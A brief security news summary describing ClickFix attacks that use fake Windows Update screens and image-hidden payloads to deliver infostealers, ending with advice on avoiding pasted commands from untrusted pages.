Researchers have uncovered a new wave of ClickFix attacks that trick Windows users into installing malware by faking legitimate system update screens and hiding malicious code in images. The scam begins with a full-screen browser page styled to look like the official “Windows Update” interface, prompting users to press Win+R, paste a command, and run it — a command that downloads and executes malware. Instead of a visible executable file, the actual payload is concealed via steganography inside a PNG image’s pixel data, then decrypted and loaded directly into memory to bypass traditional antivirus detection. The final malware delivered is often an infostealer such as Rhadamanthys or LummaC2, which can harvest credentials and other sensitive data. To stay safe, avoid running code or commands from untrusted webpages — legitimate updates or CAPTCHA checks never require manual command-line entry — and use real-time security software plus caution when a site asks you to paste commands or “verify” your system.
